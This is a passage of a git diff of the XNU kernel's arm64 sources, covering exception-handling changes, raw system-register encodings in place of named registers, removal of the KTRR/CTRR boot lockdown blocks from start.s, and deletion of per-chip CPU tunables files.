__builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_STS)); - l2c_err_adr = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_ADR)); - l2c_err_inf = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_INF)); - lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_LSU_ERR_STS)); - fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_FED_ERR_STS)); + migsts = __builtin_arm_rsr64(STR(MIGSTS_EL1)); + mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C0_0)); + l2c_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C8_0)); + l2c_err_adr = __builtin_arm_rsr64(STR(S3_3_C15_C9_0)); + l2c_err_inf = __builtin_arm_rsr64(STR(S3_3_C15_C10_0)); + lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C0_0)); + fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_0)); panic_plain("Unhandled " CPU_NAME " implementation specific error. state=%p esr=%#x far=%p p-core?%d migsts=%p\n" @@ -361,24 +365,24 @@ arm64_implementation_specific_error(arm_saved_state_t *state, uint32_t esr, vm_o #else // !defined(NO_ECORE) && !defined(HAS_MIGSTS) uint64_t llc_err_sts, llc_err_adr, llc_err_inf, mpidr; #if defined(HAS_DPC_ERR) - uint64_t dpc_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_DPC_ERR_STS)); + uint64_t dpc_err_sts = __builtin_arm_rsr64(STR(S3_5_C15_C0_5)); #endif // defined(HAS_DPC_ERR) mpidr = __builtin_arm_rsr64("MPIDR_EL1"); if (mpidr & MPIDR_PNE) { - mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_MMU_ERR_STS)); - lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_LSU_ERR_STS)); - fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_FED_ERR_STS)); + mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C0_0)); + lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C0_0)); + fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_0)); } else { - mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_E_MMU_ERR_STS)); - lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_E_LSU_ERR_STS)); - fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_E_FED_ERR_STS)); + mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C2_0)); + lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C2_0)); + fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_2)); } - llc_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_STS)); - llc_err_adr = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_ADR)); - llc_err_inf = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_INF)); + llc_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C8_0)); + llc_err_adr = __builtin_arm_rsr64(STR(S3_3_C15_C9_0)); + llc_err_inf = __builtin_arm_rsr64(STR(S3_3_C15_C10_0)); panic_plain("Unhandled " CPU_NAME " implementation specific error. state=%p esr=%#x far=%p p-core?%d" @@ -555,7 +559,7 @@ __attribute__((__always_inline__)) static inline void task_vtimer_check(thread_t thread) { - if (__improbable(thread->task->vtimers)) { + if (__improbable((thread->task != NULL) && thread->task->vtimers)) { thread->ast |= AST_BSD; thread->machine.CpuDatap->cpu_pending_ast |= AST_BSD; } @@ -893,6 +897,7 @@ handle_uncategorized(arm_saved_state_t *state) */ DebuggerCall(exception, state); + current_thread()->machine.kpcb = NULL; (void) ml_set_interrupts_enabled(interrupt_state); return; } else { @@ -1292,9 +1297,9 @@ handle_user_abort(arm_saved_state_t *state, uint32_t esr, vm_offset_t fault_addr thread->iotier_override = THROTTLE_LEVEL_NONE; /* Reset IO tier override before handling abort from userspace */ if (is_vm_fault(fault_code)) { - kern_return_t result = KERN_FAILURE; vm_map_t map = thread->map; vm_offset_t vm_fault_addr = fault_addr; + kern_return_t result = KERN_FAILURE; assert(map != kernel_map); @@ -1330,21 +1335,22 @@ handle_user_abort(arm_saved_state_t *state, uint32_t esr, vm_offset_t fault_addr } } #endif - /* check to see if it is just a pmap ref/modify fault */ - if ((result != KERN_SUCCESS) && !is_translation_fault(fault_code)) { + if (!is_translation_fault(fault_code)) { result = arm_fast_fault(map->pmap, vm_fault_addr, fault_type, (fault_code == FSC_ACCESS_FLAG_FAULT_L3), TRUE); } - if (result != KERN_SUCCESS) { - { - /* We have to fault the page in */ - result = vm_fault(map, vm_fault_addr, fault_type, - /* change_wiring */ FALSE, VM_KERN_MEMORY_NONE, THREAD_ABORTSAFE, - /* caller_pmap */ NULL, /* caller_pmap_addr */ 0); - } + if (result == KERN_SUCCESS) { + return; + } + + { + /* We have to fault the page in */ + result = vm_fault(map, vm_fault_addr, fault_type, + /* change_wiring */ FALSE, VM_KERN_MEMORY_NONE, THREAD_ABORTSAFE, + /* caller_pmap */ NULL, /* caller_pmap_addr */ 0); } if (result == KERN_SUCCESS || result == KERN_ABORTED) { return; @@ -1519,7 +1525,15 @@ handle_kernel_abort(arm_saved_state_t *state, uint32_t esr, vm_offset_t fault_ad interruptible = THREAD_UNINT; } else { map = thread->map; - interruptible = THREAD_ABORTSAFE; + + /** + * In the case that the recovery handler is set (e.g., during copyio + * and dtrace probes), we don't want the vm_fault() operation to be + * aborted early. Those code paths can't handle restarting the + * vm_fault() operation so don't allow it to return early without + * creating the wanted mapping. + */ + interruptible = (recover) ? THREAD_UNINT : THREAD_ABORTSAFE; } #if CONFIG_PGTRACE @@ -1629,10 +1643,11 @@ handle_svc(arm_saved_state_t *state) mach_kauth_cred_uthread_update(); if (trap_no < 0) { - if (trap_no == MACH_ARM_TRAP_ABSTIME) { + switch (trap_no) { + case MACH_ARM_TRAP_ABSTIME: handle_mach_absolute_time_trap(state); return; - } else if (trap_no == MACH_ARM_TRAP_CONTTIME) { + case MACH_ARM_TRAP_CONTTIME: handle_mach_continuous_time_trap(state); return; } @@ -1665,6 +1680,7 @@ handle_mach_continuous_time_trap(arm_saved_state_t *state) saved_state64(state)->x[0] = now; } + __attribute__((noreturn)) static void handle_msr_trap(arm_saved_state_t *state, uint32_t esr) @@ -1780,7 +1796,7 @@ sleh_fiq(arm_saved_state_t *state) uint64_t ipi_sr = 0; if (gFastIPI) { - MRS(ipi_sr, ARM64_REG_IPI_SR); + MRS(ipi_sr, "S3_5_C15_C1_1"); if (ipi_sr & 1) { is_ipi = TRUE; @@ -1802,6 +1818,7 @@ sleh_fiq(arm_saved_state_t *state) sleh_interrupt_handler_prologue(state, type); + #if defined(HAS_IPI) if (is_ipi) { /* @@ -1812,7 +1829,7 @@ sleh_fiq(arm_saved_state_t *state) * IPI to this CPU may be lost. ISB is required to ensure the msr * is retired before execution of cpu_signal_handler(). */ - MSR(ARM64_REG_IPI_SR, ipi_sr); + MSR("S3_5_C15_C1_1", ipi_sr); __builtin_arm_isb(ISB_SY); cpu_signal_handler(); } else @@ -1844,6 +1861,7 @@ sleh_fiq(arm_saved_state_t *state) INTERRUPT_MASKED_DEBUG_END(); } + sleh_interrupt_handler_epilogue(); #if MACH_ASSERT if (preemption_level != get_preemption_level()) { diff --git a/osfmk/arm64/smccc_asm.h b/osfmk/arm64/smccc_asm.h new file mode 100644 index 000000000..1f27d8d8b --- /dev/null +++ b/osfmk/arm64/smccc_asm.h @@ -0,0 +1,60 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#ifndef _ARM64_SMCCC_ASM_H_ +#define _ARM64_SMCCC_ASM_H_ + +#ifndef __ASSEMBLER__ +#error "This header should only be used in .s files" +#endif + +/* + * SAVE_SMCCC_CLOBBERED_REGISTERS + * + * Saves x0-x3 to stack in preparation for an hvc/smc call. + */ + +.macro SAVE_SMCCC_CLOBBERED_REGISTERS +stp x0, x1, [sp, #- 16]! +stp x2, x3, [sp, #- 16]! +.endmacro + +/* + * LOAD_SMCCC_CLOBBERED_REGISTERS + * + * Loads x0-x3 from stack after an hvc/smc call. + */ + +.macro LOAD_SMCCC_CLOBBERED_REGISTERS +ldp x2, x3, [sp], #16 +ldp x0, x1, [sp], #16 +.endmacro + +#endif /* _ARM64_SMCCC_ASM_H_ */ + +/* vim: set ts=4 ft=asm: */ diff --git a/osfmk/arm64/start.s b/osfmk/arm64/start.s index 10d16d122..5b64fbf5f 100644 --- a/osfmk/arm64/start.s +++ b/osfmk/arm64/start.s @@ -137,48 +137,6 @@ LEXT(reset_vector) #endif -#if defined(KERNEL_INTEGRITY_KTRR) - /* - * Set KTRR registers immediately after wake/resume - * - * During power on reset, XNU stashed the kernel text region range values - * into __DATA,__const which should be protected by AMCC RoRgn at this point. - * Read this data and program/lock KTRR registers accordingly. - * If either values are zero, we're debugging kernel so skip programming KTRR. - */ - - /* refuse to boot if machine_lockdown() hasn't completed */ - adrp x17, EXT(lockdown_done)@page - ldr w17, [x17, EXT(lockdown_done)@pageoff] - cbz w17, . - - // load stashed rorgn_begin - adrp x17, EXT(ctrr_begin)@page - add x17, x17, EXT(ctrr_begin)@pageoff - ldr x17, [x17] -#if DEBUG || DEVELOPMENT || CONFIG_DTRACE - // if rorgn_begin is zero, we're debugging. skip enabling ktrr - cbz x17, Lskip_ktrr -#else - cbz x17, . -#endif - - // load stashed rorgn_end - adrp x19, EXT(ctrr_end)@page - add x19, x19, EXT(ctrr_end)@pageoff - ldr x19, [x19] -#if DEBUG || DEVELOPMENT || CONFIG_DTRACE - cbz x19, Lskip_ktrr -#else - cbz x19, . -#endif - - msr ARM64_REG_KTRR_LOWER_EL1, x17 - msr ARM64_REG_KTRR_UPPER_EL1, x19 - mov x17, #1 - msr ARM64_REG_KTRR_LOCK_EL1, x17 -Lskip_ktrr: -#endif /* defined(KERNEL_INTEGRITY_KTRR) */ // Process reset handlers adrp x19, EXT(ResetHandlerData)@page // Get address of the reset handler data @@ -203,62 +161,6 @@ Lnext_cpu_data_entry: b.eq Lskip_cpu_reset_handler // Not found b Lcheck_cpu_data_entry // loop Lfound_cpu_data_entry: -#if defined(KERNEL_INTEGRITY_CTRR) - /* - * Program and lock CTRR if this CPU is non-boot cluster master. boot cluster will be locked - * in machine_lockdown. pinst insns protected by VMSA_LOCK - * A_PXN and A_MMUON_WRPROTECT options provides something close to KTRR behavior - */ - - /* refuse to boot if machine_lockdown() hasn't completed */ - adrp x17, EXT(lockdown_done)@page - ldr w17, [x17, EXT(lockdown_done)@pageoff] - cbz w17, . - - // load stashed rorgn_begin - adrp x17, EXT(ctrr_begin)@page - add x17, x17, EXT(ctrr_begin)@pageoff - ldr x17, [x17] -#if DEBUG || DEVELOPMENT || CONFIG_DTRACE - // if rorgn_begin is zero, we're debugging. skip enabling ctrr - cbz x17, Lskip_ctrr -#else - cbz x17, . -#endif - - // load stashed rorgn_end - adrp x19, EXT(ctrr_end)@page - add x19, x19, EXT(ctrr_end)@pageoff - ldr x19, [x19] -#if DEBUG || DEVELOPMENT || CONFIG_DTRACE - cbz x19, Lskip_ctrr -#else - cbz x19, . -#endif - - mrs x18, ARM64_REG_CTRR_LOCK_EL1 - cbnz x18, Lskip_ctrr /* don't touch if already locked */ - msr ARM64_REG_CTRR_A_LWR_EL1, x17 - msr ARM64_REG_CTRR_A_UPR_EL1, x19 - mov x18, #(CTRR_CTL_EL1_A_PXN | CTRR_CTL_EL1_A_MMUON_WRPROTECT) - msr ARM64_REG_CTRR_CTL_EL1, x18 - mov x18, #1 - msr ARM64_REG_CTRR_LOCK_EL1, x18 - - - isb - tlbi vmalle1 - dsb ish - isb -Lspin_ctrr_unlocked: - /* we shouldn't ever be here as cpu start is serialized by cluster in cpu_start(), - * and first core started in cluster is designated cluster master and locks - * both core and cluster. subsequent cores in same cluster will run locked from - * from reset vector */ - mrs x18, ARM64_REG_CTRR_LOCK_EL1 - cbz x18, Lspin_ctrr_unlocked -Lskip_ctrr: -#endif adrp x20, EXT(const_boot_args)@page add x20, x20, EXT(const_boot_args)@pageoff ldr x0, [x21, CPU_RESET_HANDLER] // Call CPU reset handler @@ -780,7 +682,7 @@ common_start: #if defined(APPLEHURRICANE) // Increase Snoop reservation in EDB to reduce starvation risk // Needs to be done before MMU is enabled - HID_INSERT_BITS ARM64_REG_HID5, ARM64_REG_HID5_CrdEdbSnpRsvd_mask, ARM64_REG_HID5_CrdEdbSnpRsvd_VALUE, x12 + HID_INSERT_BITS HID5, ARM64_REG_HID5_CrdEdbSnpRsvd_mask, ARM64_REG_HID5_CrdEdbSnpRsvd_VALUE, x12 #endif #if defined(BCM2837) @@ -876,36 +778,26 @@ common_start: #if defined(APPLE_ARM64_ARCH_FAMILY) - // Initialization common to all Apple targets + // Initialization common to all non-virtual Apple targets ARM64_IS_PCORE x15 - ARM64_READ_EP_SPR x15, x12, ARM64_REG_EHID4, ARM64_REG_HID4 + ARM64_READ_EP_SPR x15, x12, S3_0_C15_C4_1, S3_0_C15_C4_0 orr x12, x12, ARM64_REG_HID4_DisDcMVAOps orr x12, x12, ARM64_REG_HID4_DisDcSWL2Ops - ARM64_WRITE_EP_SPR x15, x12, ARM64_REG_EHID4, ARM64_REG_HID4 + ARM64_WRITE_EP_SPR x15, x12, S3_0_C15_C4_1, S3_0_C15_C4_0 #endif // APPLE_ARM64_ARCH_FAMILY // Read MIDR before start of per-SoC tunables mrs x12, MIDR_EL1 -#if defined(APPLELIGHTNING) - // Cebu - -#if defined(APPLETYPHOON) -#include "tunables_h7.s" -#elif defined(APPLETWISTER) -#include "tunables_h8.s" -#elif defined(APPLEHURRICANE) -#include "tunables_h9.s" -#elif defined(APPLEMONSOON) -#include "tunables_h10.s" -#elif defined(APPLEVORTEX) -#include "tunables_h11.s" -#elif defined(APPLELIGHTNING) -#include "tunables_h12.s" -#elif defined(APPLEFIRESTORM) -#include "tunables_h13.s" -#else -.macro APPLY_TUNABLES -.endmacro -#endif diff --git a/osfmk/arm64/tunables/tunables_h10.s b/osfmk/arm64/tunables/tunables_h10.s deleted file mode 100644 index e246200ed..000000000 --- a/osfmk/arm64/tunables/tunables_h10.s +++ /dev/null @@ -1,76 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -.macro APPLY_TUNABLES - /***** Tunables that apply to all cores, all revisions *****/ - - // SW WAR/eval: WKdm write ack lost when bif_wke_colorWrAck_XXaH asserts concurrently for both colors - HID_SET_BITS ARM64_REG_HID8, ARM64_REG_HID8_WkeForceStrictOrder, $1 - - /***** Tunables that apply to all P cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to all E cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to specific cores, all revisions *****/ - EXEC_COREEQ_REVALL MIDR_SKYE_MISTRAL, $0, $1 - // : Atomic launch eligibility is erroneously taken away when a store at SMB gets invalidated - HID_CLEAR_BITS ARM64_REG_EHID11, ARM64_REG_EHID11_SmbDrainThresh_mask, $1 - EXEC_END - - /***** Tunables that apply to specific cores and revisions *****/ - EXEC_COREEQ_REVLO MIDR_SKYE_MISTRAL, CPU_VERSION_B0, $0, $1 - - // Disable downstream fill bypass logic - // [Tunable] Skye - L2E fill bypass collision from both pipes to ecore - HID_SET_BITS ARM64_REG_EHID5, ARM64_REG_EHID5_DisFillByp, $1 - - // Disable forwarding of return addresses to the NFP - // Skye: FED incorrectly taking illegal va exception - HID_SET_BITS ARM64_REG_EHID0, ARM64_REG_EHID0_nfpRetFwdDisb, $1 - - EXEC_END - - EXEC_COREALL_REVLO CPU_VERSION_B0, $0, $1 - - // Disable clock divider gating - // [Tunable/Errata][cpu_1p_1e] [CPGV2] ACC power down issue when link FSM switches from GO_DN to CANCEL and at the same time upStreamDrain request is set. - HID_SET_BITS ARM64_REG_HID6, ARM64_REG_HID6_DisClkDivGating, $1 - - // Disable clock dithering - // [Tunable] Skye A0: Linux: LLC PIO Errors - HID_SET_BITS ARM64_REG_ACC_OVRD, ARM64_REG_ACC_OVRD_dsblClkDtr, $1 - HID_SET_BITS ARM64_REG_ACC_EBLK_OVRD, ARM64_REG_ACC_OVRD_dsblClkDtr, $1 - - EXEC_END - - EXEC_COREALL_REVHS CPU_VERSION_B0, $0, $1 - // : Disable refcount syncing between E and P - HID_INSERT_BITS ARM64_REG_CYC_OVRD, ARM64_REG_CYC_OVRD_dsblSnoopTime_mask, ARM64_REG_CYC_OVRD_dsblSnoopPTime, $1 - EXEC_END -.endmacro \ No newline at end of file diff --git a/osfmk/arm64/tunables/tunables_h11.s b/osfmk/arm64/tunables/tunables_h11.s deleted file mode 100644 index 9fb5b0d9c..000000000 --- a/osfmk/arm64/tunables/tunables_h11.s +++ /dev/null @@ -1,80 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -.macro APPLY_TUNABLES - /***** Tunables that apply to all cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to all P cores, all revisions *****/ - EXEC_PCORE_REVALL $0, $1 - // rdar://problem/34435356: segfaults due to IEX clock-gating - HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_rccForceAllIexL3ClksOn, $1 - - // Prevent ordered loads from being dispatched from LSU until all prior loads have completed. - // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations - HID_SET_BITS ARM64_REG_HID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1 - - // rdar://problem/38482968: [Cyprus Tunable] Poisoned cache line crossing younger load is not redirected by older load-barrier - HID_SET_BITS ARM64_REG_HID3, ARM64_REG_HID3_DisColorOpt, $1 - - // rdar://problem/41056604: disable faster launches of uncacheable unaligned stores to workaround load/load ordering violation - HID_SET_BITS ARM64_REG_HID11, ARM64_REG_HID11_DisX64NTLnchOpt, $1 - - EXEC_END - - /***** Tunables that apply to all E cores, all revisions *****/ - EXEC_ECORE_REVALL $0, $1 - // Prevent ordered loads from being dispatched from LSU until all prior loads have completed. - // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations - HID_SET_BITS ARM64_REG_EHID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1 - - // rdar://problem/36595004: Poisoned younger load is not redirected by older load-acquire - HID_SET_BITS ARM64_REG_EHID3, ARM64_REG_EHID3_DisColorOpt, $1 - - // rdar://problem/37949166: Disable the extension of prefetcher training pipe clock gating, revert to default gating - HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_rccDisPwrSavePrfClkOff, $1 - - EXEC_END - - /***** Tunables that apply to specific cores, all revisions *****/ - // Should be applied to all Aruba variants, but only Cyprus variants B0 and later - EXEC_COREEQ_REVALL MIDR_ARUBA_VORTEX, $0, $1 - // rdar://problem/36716477: data corruption due to incorrect branch predictor resolution - HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_enaBrKillLimit, $1 - EXEC_END - - /***** Tunables that apply to specific cores and revisions *****/ - EXEC_COREEQ_REVHS MIDR_CYPRUS_VORTEX, CPU_VERSION_A1, $0, $1 - // rdar://problem/36716477: data corruption due to incorrect branch predictor resolution - HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_enaBrKillLimit, $1 - EXEC_END - - EXEC_COREEQ_REVEQ MIDR_ARUBA_VORTEX, CPU_VERSION_A1, $0, $1 - // rdar://problem/40695685: Enable BIF fill buffer stall logic to prevent skid buffer overflow (Aruba A1 only) - HID_SET_BITS ARM64_REG_HID5, ARM64_REG_HID5_EnableDnFIFORdStall, $1 - EXEC_END -.endmacro \ No newline at end of file diff --git a/osfmk/arm64/tunables/tunables_h12.s b/osfmk/arm64/tunables/tunables_h12.s deleted file mode 100644 index 7b988d0d1..000000000 --- a/osfmk/arm64/tunables/tunables_h12.s +++ /dev/null @@ -1,100 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -.macro APPLY_TUNABLES - /***** Tunables that apply to all cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to all P cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to all E cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to specific cores, all revisions *****/ - EXEC_COREEQ_REVALL MIDR_CEBU_LIGHTNING, $0, $1 - // rdar://53907283 ([Cebu ACC Errata] Sibling Merge in LLC can cause UC load to violate ARM Memory Ordering Rules.) - HID_SET_BITS ARM64_REG_HID5, ARM64_REG_HID5_DisFill2cMerge, $1 - - // rdar://problem/54615539: [Cebu ACC Tunable]Cross-beat Crypto(AES/PMUL) ICache fusion is not disabled for branch uncondtional recoded instruction. - HID_SET_BITS ARM64_REG_HID0, ARM64_REG_HID0_CacheFusionDisable, $1 - - // rdar://problem/50664291: [Cebu B0/B1 Tunables][PerfVerif][LSU] Post-silicon tuning of STNT widget contiguous counter threshold - HID_INSERT_BITS ARM64_REG_HID4, ARM64_REG_HID4_CnfCntrThresh_mask, ARM64_REG_HID4_CnfCntrThresh_VALUE, $1 - - // rdar://problem/47744434: Barrier Load Ordering property is not satisfied for x64-loads - HID_SET_BITS ARM64_REG_HID9, ARM64_REG_HID9_EnableFixBug47221499, $1 - - // rdar://problem/50664291: [Cebu B0/B1 Tunables][PerfVerif][LSU] Post-silicon tuning of STNT widget contiguous counter threshold - HID_SET_BITS ARM64_REG_HID9, ARM64_REG_HID9_DisSTNTWidgetForUnalign, $1 - - // rdar://problem/47865629: RF bank and Multipass conflict forward progress widget does not handle 3+ cycle livelock - HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_EnRs4Sec, $1 - HID_CLEAR_BITS ARM64_REG_HID16, ARM64_REG_HID16_DisxPickRs45, $1 - HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_EnMPxPick45, $1 - HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_EnMPCyc7, $1 - - // Prevent ordered loads from being dispatched from LSU until all prior loads have completed. - // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations - HID_SET_BITS ARM64_REG_HID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1 - - // rdar://problem/51690962: Disable Store-Non-Temporal downgrade widget - HID_SET_BITS ARM64_REG_HID4, ARM64_REG_HID4_DisSTNTWidget, $1 - - // rdar://problem/41056604: disable faster launches of uncacheable unaligned stores to workaround load/load ordering violation - HID_SET_BITS ARM64_REG_HID11, ARM64_REG_HID11_DisX64NTLnchOpt, $1 - - // rdar://problem/45024523: enable aggressive LEQ throttling to work around LEQ credit leak - HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_leqThrottleAggr, $1 - - // rdar://problem/41029832: configure dummy cycles to work around incorrect temp sensor readings on NEX power gating - HID_INSERT_BITS ARM64_REG_HID13, ARM64_REG_HID13_PreCyc_mask, ARM64_REG_HID13_PreCyc_VALUE, $1 - EXEC_END - - EXEC_COREEQ_REVALL MIDR_CEBU_THUNDER, $0, $1 - // rdar://53907283 ([Cebu ACC Errata] Sibling Merge in LLC can cause UC load to violate ARM Memory Ordering Rules.) - HID_SET_BITS ARM64_REG_HID5, ARM64_REG_HID5_DisFill2cMerge, $1 - - // rdar://problem/48476033: Prevent store-to-load forwarding for UC memory to avoid barrier ordering violation - HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_ForceWStDrainUc, $1 - - // Prevent ordered loads from being dispatched from LSU until all prior loads have completed. - // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations - HID_SET_BITS ARM64_REG_EHID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1 - - // rdar://problem/37949166: Disable the extension of prefetcher training pipe clock gating, revert to default gating - HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_rccDisPwrSavePrfClkOff, $1 - EXEC_END - - EXEC_COREEQ_REVALL MIDR_TURKS, $0, $1 - // rdar://problem/53506680: [MP_CHECKER] Load STLFs from a completed UC/NC/NT store causing barrier ordering violation - HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_ForceWStDrainUc, $1 - EXEC_END - - /***** Tunables that apply to specific cores and revisions *****/ - /* N/A */ -.endmacro \ No newline at end of file diff --git a/osfmk/arm64/tunables/tunables_h13.s b/osfmk/arm64/tunables/tunables_h13.s deleted file mode 100644 index d6c12f25b..000000000 --- a/osfmk/arm64/tunables/tunables_h13.s +++ /dev/null @@ -1,29 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -.macro APPLY_TUNABLES -.endmacro diff --git a/osfmk/arm64/tunables/tunables_h7.s 